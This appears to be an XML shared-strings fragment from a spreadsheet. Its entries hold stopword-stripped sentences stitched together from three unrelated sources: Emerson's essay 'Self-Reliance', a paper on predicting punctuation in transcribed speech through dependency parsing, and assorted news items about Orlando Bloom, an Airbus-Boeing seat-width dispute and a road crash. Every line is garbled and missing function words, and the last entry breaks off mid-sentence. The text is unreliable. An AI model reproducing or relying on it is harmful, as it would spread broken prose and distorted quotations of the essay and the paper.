  <si>
    <t xml:space="preserve"> Society everywhere conspiracy manhood every one members</t>
  </si>
  <si>
    <t xml:space="preserve"> Society joint-stock company, members agree, better securing bread shareholder, surrender liberty culture eater</t>
  </si>
  <si>
    <t xml:space="preserve"> The virtue request conformity</t>
  </si>
  <si>
    <t xml:space="preserve"> Self-reliance aversion</t>
  </si>
  <si>
    <t xml:space="preserve"> It loves realities creators, names customs</t>
  </si>
  <si>
    <t xml:space="preserve"> Whoso would man must nonconformist</t>
  </si>
  <si>
    <t xml:space="preserve"> He would gather immortal palms must hindered name goodness, must explore goodness</t>
  </si>
  <si>
    <t xml:space="preserve"> Nothing last sacred integrity mind</t>
  </si>
  <si>
    <t xml:space="preserve"> Absolve yourself, shall suffrage world</t>
  </si>
  <si>
    <t xml:space="preserve"> I remember answer quite young I prompted make valued adviser, wont importune dear old doctrines church</t>
  </si>
  <si>
    <t xml:space="preserve"> On saying, What I sacredness traditions, I live wholly within? friend suggested, — “But impulses may below, above</t>
  </si>
  <si>
    <t>” I replied, “They seem such; I Devil’s child, I live Devil</t>
  </si>
  <si>
    <t>” No law sacred nature</t>
  </si>
  <si>
    <t xml:space="preserve"> Good bad names readily transferable this; right constitution, wrong it</t>
  </si>
  <si>
    <t xml:space="preserve"> A man carry presence opposition, every thing titular ephemeral he</t>
  </si>
  <si>
    <t xml:space="preserve"> I ashamed think easily capitulate badges names, large societies dead institutions</t>
  </si>
  <si>
    <t xml:space="preserve"> Every decent well-spoken individual affects sways right</t>
  </si>
  <si>
    <t xml:space="preserve"> I ought go upright vital, speak rude truth ways</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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Thy love afar spite home</t>
  </si>
  <si>
    <t>’ Rough graceless would greeting, truth handsomer affectation love</t>
  </si>
  <si>
    <t xml:space="preserve"> Your goodness must edge it, — else none</t>
  </si>
  <si>
    <t xml:space="preserve"> The doctrine hatred must preached counteraction doctrine love pules whines</t>
  </si>
  <si>
    <t xml:space="preserve"> I shun father mother wife brother, genius calls me</t>
  </si>
  <si>
    <t xml:space="preserve"> I would write lintels door-post, Whim</t>
  </si>
  <si>
    <t xml:space="preserve"> I hope somewhat better whim last, cannot spend day explanation</t>
  </si>
  <si>
    <t xml:space="preserve"> Expect show cause I seek I exclude company</t>
  </si>
  <si>
    <t xml:space="preserve"> Then, again, tell me, good man to-day, obligation put poor men good situations</t>
  </si>
  <si>
    <t xml:space="preserve"> Are poor? I tell thee, thou foolish philanthropist, I grudge dollar, dime, cent, I give men belong I belong</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</si>
  <si>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</si>
  <si>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 Virtues are, popular estimate, rather exception rule</t>
  </si>
  <si>
    <t xml:space="preserve"> There man virtues</t>
  </si>
  <si>
    <t xml:space="preserve"> Men called good action, piece courage charity, much would pay fine expiation daily non-appearance parade</t>
  </si>
  <si>
    <t xml:space="preserve"> Their works done apology extenuation living world, — invalids insane pay high board</t>
  </si>
  <si>
    <t xml:space="preserve"> Their virtues penances</t>
  </si>
  <si>
    <t xml:space="preserve"> I wish expiate, live</t>
  </si>
  <si>
    <t xml:space="preserve"> My life spectacle</t>
  </si>
  <si>
    <t xml:space="preserve"> I much prefer lower strain, genuine equal, glittering unsteady</t>
  </si>
  <si>
    <t xml:space="preserve"> I wish sound sweet, need diet bleeding</t>
  </si>
  <si>
    <t xml:space="preserve"> I ask primary evidence man, refuse appeal man actions</t>
  </si>
  <si>
    <t xml:space="preserve"> I know makes difference whether I forbear actions reckoned excellent</t>
  </si>
  <si>
    <t xml:space="preserve"> I cannot consent pay privilege I intrinsic right</t>
  </si>
  <si>
    <t xml:space="preserve"> Few mean gifts may be, I actually am, need assurance assurance fellows secondary testimony</t>
  </si>
  <si>
    <t xml:space="preserve"> What I must concerns me, people think</t>
  </si>
  <si>
    <t xml:space="preserve"> This rule, equally arduous actual intellectual life, may serve whole distinction greatness meanness</t>
  </si>
  <si>
    <t xml:space="preserve"> It harder, always find think know duty better know it</t>
  </si>
  <si>
    <t xml:space="preserve"> It easy world live world’s opinion; easy solitude live own; great man midst crowd keeps perfect sweetness independence solitude</t>
  </si>
  <si>
    <t xml:space="preserve"> The objection conforming usages become dead is, scatters force</t>
  </si>
  <si>
    <t xml:space="preserve"> It loses time blurs impression character</t>
  </si>
  <si>
    <t xml:space="preserve"> If maintain dead church, contribute dead Bible-society, vote great party either government it, spread table like base housekeepers, — screens I difficulty detect precise man are</t>
  </si>
  <si>
    <t xml:space="preserve"> And, course, much force withdrawn proper life</t>
  </si>
  <si>
    <t xml:space="preserve"> But work, I shall know you</t>
  </si>
  <si>
    <t xml:space="preserve"> Do work, shall reinforce yourself</t>
  </si>
  <si>
    <t xml:space="preserve"> A man must consider blindman’s-buff game conformity</t>
  </si>
  <si>
    <t xml:space="preserve"> If I know sect, I anticipate argument</t>
  </si>
  <si>
    <t xml:space="preserve"> I hear preacher announce text topic expediency one institutions church</t>
  </si>
  <si>
    <t xml:space="preserve"> Do I know beforehand possibly say new spontaneous word? Do I know that, ostentation examining grounds institution, thing? Do I know pledged look one side, — permitted side, man, parish minister? He retained attorney, airs bench emptiest affectation</t>
  </si>
  <si>
    <t xml:space="preserve"> Well, men bound eyes one another handkerchief, attached one communities opinion</t>
  </si>
  <si>
    <t xml:space="preserve"> This conformity makes false particulars, authors lies, false particulars</t>
  </si>
  <si>
    <t xml:space="preserve"> Their every truth quite true</t>
  </si>
  <si>
    <t xml:space="preserve"> Their two real two, four real four; every word say chagrins us, know begin set right</t>
  </si>
  <si>
    <t xml:space="preserve"> Meantime nature slow equip us prison-uniform party adhere</t>
  </si>
  <si>
    <t xml:space="preserve"> We come wear one cut face figure, acquire degrees gentlest asinine expression</t>
  </si>
  <si>
    <t xml:space="preserve"> There mortifying experience particular, fail wreak also general history; I mean “the foolish face praise,” forced smile put company feel ease answer conversation interest us</t>
  </si>
  <si>
    <t xml:space="preserve"> The muscles, spontaneously moved, moved low usurping wilfulness, grow tight outline face disagreeable sensation</t>
  </si>
  <si>
    <t xml:space="preserve"> For nonconformity world whips displeasure</t>
  </si>
  <si>
    <t xml:space="preserve"> And therefore man must know estimate sour face</t>
  </si>
  <si>
    <t xml:space="preserve"> The by-standers look askance public street friend’s parlour</t>
  </si>
  <si>
    <t xml:space="preserve"> If aversation origin contempt resistance like own, might well go home sad countenance; sour faces multitude, like sweet faces, deep cause, put wind blows newspaper directs</t>
  </si>
  <si>
    <t xml:space="preserve"> Yet discontent multitude formidable senate college</t>
  </si>
  <si>
    <t xml:space="preserve"> It easy enough firm man knows world brook rage cultivated classes</t>
  </si>
  <si>
    <t xml:space="preserve"> Their rage decorous prudent, timid vulnerable themselves</t>
  </si>
  <si>
    <t xml:space="preserve"> But feminine rage indignation people added, ignorant poor aroused, unintelligent brute force lies bottom society made growl mow, needs habit magnanimity religion treat godlike trifle concernment</t>
  </si>
  <si>
    <t xml:space="preserve"> The terror scares us self-trust consistency; reverence past act word, eyes others data computing orbit past acts, loath disappoint them</t>
  </si>
  <si>
    <t xml:space="preserve"> But keep head shoulder? Why drag corpse memory, lest contradict somewhat stated public place? Suppose contradict yourself; then? It seems rule wisdom never rely memory alone, scarcely even acts pure memory, bring past judgment thousand-eyed present, live ever new day</t>
  </si>
  <si>
    <t xml:space="preserve"> In metaphysics denied personality Deity: yet devout motions soul come, yield heart life, though clothe God shape color</t>
  </si>
  <si>
    <t xml:space="preserve"> Leave theory, Joseph coat hand harlot, flee</t>
  </si>
  <si>
    <t xml:space="preserve"> A foolish consistency hobgoblin little minds, adored little statesmen philosophers divines</t>
  </si>
  <si>
    <t xml:space="preserve"> With consistency great soul simply nothing do</t>
  </si>
  <si>
    <t xml:space="preserve"> He may well concern shadow wall</t>
  </si>
  <si>
    <t xml:space="preserve"> Speak think hard words, to-morrow speak to-morrow thinks hard words again, though contradict every thing said to-day</t>
  </si>
  <si>
    <t xml:space="preserve"> — ‘Ah, shall sure misunderstood</t>
  </si>
  <si>
    <t>’ — Is bad, then, misunderstood? Pythagoras misunderstood, Socrates, Jesus, Luther, Copernicus, Galileo, Newton, every pure wise spirit ever took flesh</t>
  </si>
  <si>
    <t xml:space="preserve"> To great misunderstood</t>
  </si>
  <si>
    <t xml:space="preserve"> I suppose man violate nature</t>
  </si>
  <si>
    <t xml:space="preserve"> All sallies rounded law being, inequalities Andes Himmaleh insignificant curve sphere</t>
  </si>
  <si>
    <t xml:space="preserve"> Nor matter gauge try him</t>
  </si>
  <si>
    <t xml:space="preserve"> A character like acrostic Alexandrian stanza; — read forward, backward, across, still spells thing</t>
  </si>
  <si>
    <t xml:space="preserve"> In pleasing, contrite wood-life God allows me, let record day day honest thought without prospect retrospect, and, I cannot doubt, found symmetrical, though I mean not, see not</t>
  </si>
  <si>
    <t xml:space="preserve"> My book smell pines resound hum insects</t>
  </si>
  <si>
    <t xml:space="preserve"> The swallow window interweave thread straw carries bill web also</t>
  </si>
  <si>
    <t xml:space="preserve"> We pass are</t>
  </si>
  <si>
    <t xml:space="preserve"> Character teaches wills</t>
  </si>
  <si>
    <t xml:space="preserve"> Men imagine communicate virtue vice overt actions, see virtue vice emit breath every moment</t>
  </si>
  <si>
    <t xml:space="preserve"> There agreement whatever variety actions, honest natural hour</t>
  </si>
  <si>
    <t xml:space="preserve"> For one will, actions harmonious, however unlike seem</t>
  </si>
  <si>
    <t xml:space="preserve"> These varieties lost sight little distance, little height thought</t>
  </si>
  <si>
    <t xml:space="preserve"> One tendency unites all</t>
  </si>
  <si>
    <t xml:space="preserve"> The voyage best ship zigzag line hundred tacks</t>
  </si>
  <si>
    <t xml:space="preserve"> See line sufficient distance, straightens average tendency</t>
  </si>
  <si>
    <t xml:space="preserve"> Your genuine action explain itself, explain genuine actions</t>
  </si>
  <si>
    <t xml:space="preserve"> Your conformity explains nothing</t>
  </si>
  <si>
    <t xml:space="preserve"> Act singly, already done singly justify now</t>
  </si>
  <si>
    <t xml:space="preserve"> Greatness appeals future</t>
  </si>
  <si>
    <t xml:space="preserve"> If I firm enough to-day right, scorn eyes, I must done much right defend now</t>
  </si>
  <si>
    <t xml:space="preserve"> Be will, right now</t>
  </si>
  <si>
    <t xml:space="preserve"> Always scorn appearances, always may</t>
  </si>
  <si>
    <t xml:space="preserve"> The force character cumulative</t>
  </si>
  <si>
    <t xml:space="preserve"> All foregone days virtue work health this</t>
  </si>
  <si>
    <t xml:space="preserve"> What makes majesty heroes senate field, fills imagination? The consciousness train great days victories behind</t>
  </si>
  <si>
    <t xml:space="preserve"> They shed united light advancing actor</t>
  </si>
  <si>
    <t xml:space="preserve"> He attended visible escort angels</t>
  </si>
  <si>
    <t xml:space="preserve"> That throws thunder Chatham’s voice, dignity Washington’s port, America Adams’s eye</t>
  </si>
  <si>
    <t xml:space="preserve"> Honor venerable us ephemeris</t>
  </si>
  <si>
    <t xml:space="preserve"> It always ancient virtue</t>
  </si>
  <si>
    <t xml:space="preserve"> We worship to-day to-day</t>
  </si>
  <si>
    <t xml:space="preserve"> We love pay homage, trap love homage, selfdependent, self-derived, therefore old immaculate pedigree, even shown young person</t>
  </si>
  <si>
    <t xml:space="preserve"> I hope days heard last conformity consistency</t>
  </si>
  <si>
    <t xml:space="preserve"> Let words gazetted ridiculous henceforward</t>
  </si>
  <si>
    <t xml:space="preserve"> Instead gong dinner, let us hear whistle Spartan fife</t>
  </si>
  <si>
    <t xml:space="preserve"> Let us never bow apologize more</t>
  </si>
  <si>
    <t xml:space="preserve"> A great man coming eat house</t>
  </si>
  <si>
    <t xml:space="preserve"> I wish please him; I wish wish please me</t>
  </si>
  <si>
    <t xml:space="preserve"> I stand humanity, though I would make kind, I would make true</t>
  </si>
  <si>
    <t xml:space="preserve"> Let us affront reprimand smooth mediocrity squalid contentment times, hurl face custom, trade, office, fact upshot history, great responsible Thinker Actor working wherever man works; true man belongs time place, centre things</t>
  </si>
  <si>
    <t xml:space="preserve"> Where is, nature</t>
  </si>
  <si>
    <t xml:space="preserve"> He measures you, men, events</t>
  </si>
  <si>
    <t xml:space="preserve"> Ordinarily, every body society reminds us somewhat else, person</t>
  </si>
  <si>
    <t xml:space="preserve"> Character, reality, reminds nothing else; takes place whole creation</t>
  </si>
  <si>
    <t xml:space="preserve"> The man must much, must make circumstances indifferent</t>
  </si>
  <si>
    <t xml:space="preserve"> Every true man cause, country, age; requires infinite spaces numbers time fully accomplish design; — posterity seem follow steps train clients</t>
  </si>
  <si>
    <t xml:space="preserve"> A man Caesar born, ages Roman Empire</t>
  </si>
  <si>
    <t xml:space="preserve"> Christ born, millions minds grow cleave genius, confounded virtue possible man</t>
  </si>
  <si>
    <t xml:space="preserve"> An institution lengthened shadow one man; as, Monachism, Hermit Antony; Reformation, Luther; Quakerism, Fox; Methodism, Wesley; Abolition, Clarkson</t>
  </si>
  <si>
    <t xml:space="preserve"> Scipio, Milton called “the height Rome”; history resolves easily biography stout earnest persons</t>
  </si>
  <si>
    <t xml:space="preserve"> Standard automatic speech recognizers output unstructured streams words</t>
  </si>
  <si>
    <t xml:space="preserve"> They neither perform proper segmentation output sentences, predict punctuation symbols</t>
  </si>
  <si>
    <t xml:space="preserve"> The unavailable punctuations sentence boundaries transcribed speech texts create barriers many subsequent processing tasks, summarization, information extraction, question answering machine translation</t>
  </si>
  <si>
    <t xml:space="preserve"> Thus, segmentation long texts necessary many real applications</t>
  </si>
  <si>
    <t xml:space="preserve"> For example, speech-to-speech translation, continuously transcribed speech texts need segmented fed subsequent machine translation systems (Takezawa et al</t>
  </si>
  <si>
    <t>, 1998; Nakamura, 2009)</t>
  </si>
  <si>
    <t xml:space="preserve"> This current machine translation (MT) systems perform translation sentence level, various models used MT trained segmented sentences many algorithms inside MT exponential complexity regard length inputs</t>
  </si>
  <si>
    <t xml:space="preserve"> The punctuation prediction problem attracted research interest speech processing community natural language processing community</t>
  </si>
  <si>
    <t xml:space="preserve"> Most previous work primarily exploits local features statistical models lexicons, prosodic cues hidden event language model (HELM) (Liu et al</t>
  </si>
  <si>
    <t>, 2005; Matusov et al</t>
  </si>
  <si>
    <t>, 2006; Huang Zweig, 2002; Stolcke Shriberg, 1996)</t>
  </si>
  <si>
    <t xml:space="preserve"> The word-level models integrating local features narrow views input could achieve satisfied performance due limited context information access (Favre et al</t>
  </si>
  <si>
    <t>, 2008)</t>
  </si>
  <si>
    <t xml:space="preserve"> Naturally, global contexts required model punctuation prediction, especially long-range dependencies</t>
  </si>
  <si>
    <t xml:space="preserve"> For instance, English question sentences, ending question mark long-range dependent initial phrases (Lu Ng, 2010), “could you” Figure 1</t>
  </si>
  <si>
    <t xml:space="preserve"> There work trying incorporate syntactic features broaden view hypotheses punctuation prediction models (Roark et al</t>
  </si>
  <si>
    <t>, 2006; Favre et al</t>
  </si>
  <si>
    <t xml:space="preserve"> In methods, punctuation prediction treated separated post-procedure parsing, may suffer problem error propagation</t>
  </si>
  <si>
    <t xml:space="preserve"> In addition, approaches able incrementally process inputs efficient long inputs, especially cases long transcribed speech texts presentations number streaming words could larger hundreds thousands</t>
  </si>
  <si>
    <t xml:space="preserve"> In paper, propose jointly performing punctuation prediction transition-based dependency parsing transcribed speech text</t>
  </si>
  <si>
    <t xml:space="preserve"> When transition-based parsing consumes stream words left right shift-reduce decoding algorithm, punctuation symbols predicted word based contexts parsing tree</t>
  </si>
  <si>
    <t xml:space="preserve"> Two models proposed cause punctuation prediction interact transition actions parsing</t>
  </si>
  <si>
    <t xml:space="preserve"> One conduct transition actions parsing followed punctuation predictions cascaded way</t>
  </si>
  <si>
    <t xml:space="preserve"> The associate conventional transition actions parsing punctuation perditions, predicted punctuations directly inferred parsing tree</t>
  </si>
  <si>
    <t xml:space="preserve"> Our models linear complexity capable handling streams words length</t>
  </si>
  <si>
    <t xml:space="preserve"> In addition, computation models use rich set syntactic features, improve complicated punctuation predictions global view, especially long range dependencies</t>
  </si>
  <si>
    <t xml:space="preserve"> Figure 1 shows example parsing helps punctuation prediction transcribed speech text</t>
  </si>
  <si>
    <t xml:space="preserve"> As illustrated Figure 1(b), two commas predicted preceding words act adverbial modifiers (advmod) parsing</t>
  </si>
  <si>
    <t xml:space="preserve"> The period word “menu” predicted parsing adverbial clause modifier (advcl) completed</t>
  </si>
  <si>
    <t xml:space="preserve"> The question mark end input determined direct object modifier (dobj) identified, together long range clue auxiliary word occurs nominal subject (nsubj)</t>
  </si>
  <si>
    <t xml:space="preserve"> Eventually, two segmentations formed according punctuation prediction results, shown Figure 1(c)</t>
  </si>
  <si>
    <t xml:space="preserve"> The training data used models adapted Treebank data excluding punctuations keeping punctuation contexts, simulate unavailable annotated transcribed speech texts</t>
  </si>
  <si>
    <t xml:space="preserve"> In decoding, beam search used get optimal punctuation prediction results</t>
  </si>
  <si>
    <t xml:space="preserve"> We conduct experiments IWSLT data TDT4 test data sets</t>
  </si>
  <si>
    <t xml:space="preserve"> The experimental results show method achieve higher performance CRF-based baseline method</t>
  </si>
  <si>
    <t xml:space="preserve"> The paper structured follows: Section 2 conducts survey related work</t>
  </si>
  <si>
    <t xml:space="preserve"> The transitionbased dependency parsing introduced Section 3</t>
  </si>
  <si>
    <t xml:space="preserve"> We explain approach predicting punctuations transcribed speech texts Section 4</t>
  </si>
  <si>
    <t xml:space="preserve"> Section 5 gives results experiment</t>
  </si>
  <si>
    <t xml:space="preserve"> The conclusion future work given Section 6</t>
  </si>
  <si>
    <t xml:space="preserve"> Sentence boundary detection punctuation prediction extensively studied speech processing field attracted research interest natural language processing field well</t>
  </si>
  <si>
    <t xml:space="preserve"> Most previous work exploits local features task</t>
  </si>
  <si>
    <t xml:space="preserve"> Kim Woodland (2001), Huang Zweig (2002), Christensen et al</t>
  </si>
  <si>
    <t xml:space="preserve"> (2001), Liu et al</t>
  </si>
  <si>
    <t xml:space="preserve"> (2005) integrate prosodic features (pitch, pause duration, etc</t>
  </si>
  <si>
    <t>) lexical features (words, n-grams, etc</t>
  </si>
  <si>
    <t>) predict punctuation symbols speech recognition, Huang Zweig (2002) uses maximum entropy model, Christensen et al</t>
  </si>
  <si>
    <t xml:space="preserve"> (2001) focus finite state multi-layer perceptron methods, Liu et al</t>
  </si>
  <si>
    <t xml:space="preserve"> (2005) uses conditional random fields</t>
  </si>
  <si>
    <t xml:space="preserve"> However, scenarios prosodic cues available due inaccessible original raw speech waveforms</t>
  </si>
  <si>
    <t xml:space="preserve"> Matusov et al</t>
  </si>
  <si>
    <t xml:space="preserve"> (2006) integrate segmentation features log-linear model statistical machine translation (SMT) framework improve translation performance translating transcribed speech texts</t>
  </si>
  <si>
    <t xml:space="preserve"> Lu Ng (2010) uses dynamic conditional random fields perform sentence boundary sentence type prediction</t>
  </si>
  <si>
    <t xml:space="preserve"> They achieved promising results English Chinese transcribed speech texts</t>
  </si>
  <si>
    <t xml:space="preserve"> The work exploits local features, limited capturing long range dependencies punctuation prediction</t>
  </si>
  <si>
    <t xml:space="preserve"> It natural incorporate global knowledge, syntactic information, improve punctuation prediction performance</t>
  </si>
  <si>
    <t xml:space="preserve"> Roark et al</t>
  </si>
  <si>
    <t xml:space="preserve"> (2006) use rich set non-local features including parser scores re-rank full segmentations</t>
  </si>
  <si>
    <t xml:space="preserve"> Favre et al</t>
  </si>
  <si>
    <t xml:space="preserve"> (2008) integrate syntactic information PCFG parser log-linear combine local features sentence segmentation</t>
  </si>
  <si>
    <t xml:space="preserve"> The punctuation prediction works performed post-procedure step parsing, parse tree needs built advance</t>
  </si>
  <si>
    <t xml:space="preserve"> As parsing stream words transcribed speech text exponentially complex, approaches feasible short input processing</t>
  </si>
  <si>
    <t xml:space="preserve"> Unlike works, incorporate punctuation prediction parsing process left right input without length limitations</t>
  </si>
  <si>
    <t xml:space="preserve"> Numerous dependency parsing algorithms proposed natural language processing community, including transition-based graph-based dependency parsing</t>
  </si>
  <si>
    <t xml:space="preserve"> Compared graph-based parsing, transition-based parsing offer linear time complexity easily leverage non-local features models (Yamada Matsumoto, 2003; Nivre et al</t>
  </si>
  <si>
    <t>, 2006b; Zhang Clark, 2008; Huang Sagae, 2010)</t>
  </si>
  <si>
    <t xml:space="preserve"> Starting work (Zhang Nivre, 2011), paper extend transition-based dependency parsing sentence-level stream words integrate parsing punctuation prediction</t>
  </si>
  <si>
    <t xml:space="preserve"> Joint POS tagging transition-based dependency parsing studied (Hatori et al</t>
  </si>
  <si>
    <t>, 2011; Bohnet Nivre, 2012)</t>
  </si>
  <si>
    <t xml:space="preserve"> The improvements reported joint model compared pipeline model Chinese richly inflected languages, shows also makes sense jointly perform punctuation prediction parsing, although two tasks POS tagging punctuation prediction different two ways: 1)</t>
  </si>
  <si>
    <t xml:space="preserve"> The former usually works well-formed single sentence latter needs process multiple sentences lengthy</t>
  </si>
  <si>
    <t xml:space="preserve"> 2)</t>
  </si>
  <si>
    <t xml:space="preserve"> POS tags must-have features parsing punctuations not</t>
  </si>
  <si>
    <t xml:space="preserve"> The parsing quality former sensitive performance entire task latter</t>
  </si>
  <si>
    <t xml:space="preserve"> Orlando Bloom Miranda Kerr still love Actors Orlando Bloom Model Miranda Kerr want go separate ways </t>
  </si>
  <si>
    <t xml:space="preserve"> However , interview , Bloom said Kerr still love </t>
  </si>
  <si>
    <t xml:space="preserve"> Miranda Kerr Orlando Bloom parents two-year-old Flynn </t>
  </si>
  <si>
    <t xml:space="preserve"> Actor Orlando Bloom announced separation wife , supermodel Miranda Kerr </t>
  </si>
  <si>
    <t xml:space="preserve"> In interview US journalist Katie Couric , broadcast Friday (local time), Bloom said , &amp;quot; sometimes life &amp;apos;t go exactly plan hope &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> He Kerr still love , emphasised 36-year-old </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We &amp;apos;re going support one another love parents Flynn &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Kerr Bloom married since 2010 </t>
  </si>
  <si>
    <t xml:space="preserve"> Their son Flynn born 2011 </t>
  </si>
  <si>
    <t xml:space="preserve"> Jet makers feud seat width big orders stake A row flared leading plane makers width tourist-class seats long-distance flights , setting tone bitter confrontation month &amp;apos;s Dubai Airshow </t>
  </si>
  <si>
    <t xml:space="preserve"> The dispute focuses width seats provided long-haul flights economy passengers - always ones courted airlines , whose allocated space holds key efficiency claims latest jets offered Airbus SAS Boeing Co </t>
  </si>
  <si>
    <t xml:space="preserve"> Airbus week called industry standard would provide seat least 18 inches (46 cm) wide economy cabins , U</t>
  </si>
  <si>
    <t>S</t>
  </si>
  <si>
    <t xml:space="preserve"> arch-rival Boeing says airlines decide </t>
  </si>
  <si>
    <t xml:space="preserve"> The dispute comes plane makers vie sell ever-larger versions twin-engined long-distance aircraft , potentially record orders expected November 17-21 event </t>
  </si>
  <si>
    <t xml:space="preserve"> How back plane laid - particularly whether seating 9 10 abreast - central economic performance claims made new &amp;quot; mini-jumbo &amp;quot; jet designs </t>
  </si>
  <si>
    <t xml:space="preserve"> Boeing says revamped &amp;quot; 777X &amp;quot; hold 406 people based economy seats 17 inches wide set 10 row </t>
  </si>
  <si>
    <t xml:space="preserve"> Airbus says competing version A350 carry 350 people 18-inch-wide economy seat laid 9 abreast </t>
  </si>
  <si>
    <t xml:space="preserve"> Plane giants often trade blows technical matters advertising trade press </t>
  </si>
  <si>
    <t xml:space="preserve"> Now , Airbus appealing directly public ahead Dubai Airshow , 777X expected dominate 100 orders </t>
  </si>
  <si>
    <t xml:space="preserve"> It recently previewed may start new ad war showing financiers slide illustrating three people squashed together restaurant , titled &amp;quot; Would You Accept This ? &amp;quot; &amp;quot; Boeing proposing long-distance flying seats narrower regional turbo-props , &amp;quot; said Airbus sales chief John Leahy </t>
  </si>
  <si>
    <t xml:space="preserve"> As diets change , people get bigger plane seating radically changed </t>
  </si>
  <si>
    <t xml:space="preserve"> Between early 1970s , Boeing 747 jumbo defined modern long-haul travel , turn century , weight average American 40- 49-year-old male increased 10 per cent , according U</t>
  </si>
  <si>
    <t xml:space="preserve"> Health Department Data </t>
  </si>
  <si>
    <t xml:space="preserve"> The waist average 21st-century American male 39</t>
  </si>
  <si>
    <t>7 inches , according U</t>
  </si>
  <si>
    <t xml:space="preserve"> health statistics </t>
  </si>
  <si>
    <t xml:space="preserve"> Airbus says rival sticking seat concept 1950s , average girth newly christened &amp;quot; jet set &amp;quot; narrower </t>
  </si>
  <si>
    <t xml:space="preserve"> Airbus says commissioned research suggesting extra inch seat width improves sleep quality 53 per cent </t>
  </si>
  <si>
    <t xml:space="preserve"> Boeing disputes Airbus &amp;apos;s figures seat measurements says manufacturers step decisions airlines balance fares facilities </t>
  </si>
  <si>
    <t xml:space="preserve"> It also says research shows cabin experience depends width seat </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It really comes providing flexibility airlines allowing things believe need successful , &amp;quot; said Boeing cabins expert Kent Craver </t>
  </si>
  <si>
    <t xml:space="preserve"> They &amp;apos;t want us dictate makes profitable </t>
  </si>
  <si>
    <t xml:space="preserve"> They know business better anyone else </t>
  </si>
  <si>
    <t xml:space="preserve"> For flyers elbow room , suppliers increasingly issue could affect earnings </t>
  </si>
  <si>
    <t xml:space="preserve"> Behind dispute race plane orders least $ 700-billion estimated business list prices coming decades , enough tip scales U</t>
  </si>
  <si>
    <t xml:space="preserve"> European exports </t>
  </si>
  <si>
    <t xml:space="preserve"> As Reuters first reported July , seat layout exactly drives battle latest jets </t>
  </si>
  <si>
    <t xml:space="preserve"> Both Airbus Boeing claim 20 per cent better efficiency per seat latest twin-engined long-haul designs market leader segment , 365-seat Boeing 777-300ER </t>
  </si>
  <si>
    <t xml:space="preserve"> Boeing &amp;apos;s performance claims depend part comparing 10-abreast 777X original 9-abreast 777 design </t>
  </si>
  <si>
    <t xml:space="preserve"> The gain unit costs blunted compared 10-abreast use </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The reason Boeing cram seats make plane competitive products , &amp;quot; said Kevin Keniston , head passenger comfort Europe &amp;apos;s Airbus </t>
  </si>
  <si>
    <t xml:space="preserve"> On hand , analysts say full 10-seat-per-row cabins existing 777s suggest many passengers voting denser layout , may go hand hand cheaper fares </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Eighteen inches seat width would great passengers , reality business point Airbus proposal driven threat 777 , &amp;quot; said cabin interiors expert Mary Kirby , founder editor Runway Girl Network </t>
  </si>
  <si>
    <t xml:space="preserve"> Airbus Boeing supply seats offer catalogue suppliers airlines choose </t>
  </si>
  <si>
    <t xml:space="preserve"> Globe-trotting jet sellers even carry tape measures check competing layouts </t>
  </si>
  <si>
    <t xml:space="preserve"> While boasting comfort , builders also offer jets high-density layouts low-cost airlines regional travel </t>
  </si>
  <si>
    <t xml:space="preserve"> Airbus offers 10-abreast A350 says yet sold </t>
  </si>
  <si>
    <t xml:space="preserve"> Until recently , Airbus stressing need cabin customization offering wider aisle seats jets </t>
  </si>
  <si>
    <t xml:space="preserve"> Without support maker large modern jets , experts say call new industry standard unlikely fly , could distract wave 777X sales </t>
  </si>
  <si>
    <t xml:space="preserve"> The FAA easing restrictions use electronic gadgets airplanes - though chatting cellphones still prohibited </t>
  </si>
  <si>
    <t xml:space="preserve"> Warplanes attack store Russian missiles port city Latakia , official says </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s apparent continuation Israel &amp;apos;s campaign keep arms proliferating Mideast </t>
  </si>
  <si>
    <t xml:space="preserve"> A federal appeals court blocks judge &amp;apos;s ruling NYPD &amp;apos;s controversial tactic discriminates minorities </t>
  </si>
  <si>
    <t xml:space="preserve"> Nearly 100 African migrants hoping travel Algeria die thirst two trucks break middle Sahara </t>
  </si>
  <si>
    <t xml:space="preserve"> Experts say violence left 14 adults seven children dead nothing random chance , sign growing violence America </t>
  </si>
  <si>
    <t xml:space="preserve"> Rather rattled U</t>
  </si>
  <si>
    <t xml:space="preserve"> government shutdown , investors kept focus probably matters more: Federal Reserve </t>
  </si>
  <si>
    <t xml:space="preserve"> The California woman plans challenge may first-of-its-kind citation , saying Internet-connected eyewear makes navigation easier </t>
  </si>
  <si>
    <t xml:space="preserve"> Police say video appears show Mayor Rob Ford smoking crack pipe </t>
  </si>
  <si>
    <t xml:space="preserve"> Even close allies keep things one another - work every angle find &amp;apos;s held back </t>
  </si>
  <si>
    <t xml:space="preserve"> The Vatican wants know Catholic parishes around globe handle sensitive issues like contraception , divorce gay couples </t>
  </si>
  <si>
    <t xml:space="preserve"> Persons seriously injured following collision Early Friday afternoon , two car drivers seriously injured head-on collision Landesstraße 44 (a rural road)</t>
  </si>
  <si>
    <t xml:space="preserve"> The police completely blocked road immediately , initially could make much comment cause accident </t>
  </si>
  <si>
    <t xml:space="preserve"> However , mention various witness statements first assessed </t>
  </si>
  <si>
    <t xml:space="preserve"> What certain 19-year-old female driver VW Golf driving direction Revensdorf 38-year-old man Gettorf came towards Hyundai </t>
  </si>
  <si>
    <t xml:space="preserve"> The two vehicles collided , whereby woman severely stuck took fire service almost half hour free vehicle wreckage </t>
  </si>
  <si>
    <t xml:space="preserve"> Initially actual cause accident remained unclear </t>
  </si>
  <si>
    <t xml:space="preserve"> Both unfortunate parties taken nearby hospitals </t>
  </si>
  <si>
    <t xml:space="preserve"> The road remained fully blocked around two hours </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Nine month-old cocker spaniel Ruby run involved road crash Sunday afternoon survived three days alone rescued quarry Wednesday </t>
  </si>
  <si>
    <t xml:space="preserve"> Her owners Scott Alderson , 25 , girlfriend Becky Hall , 20 , Flappit Quarry Denholme , West Yorkshire , reunited Ruby thanked West Yorkshire Fire Rescue Service </t>
  </si>
  <si>
    <t xml:space="preserve"> They searched frantically missing dog posted appeals social networking sites ran quarry following minor accident </t>
  </si>
  <si>
    <t xml:space="preserve"> At around 2</t>
  </si>
  <si>
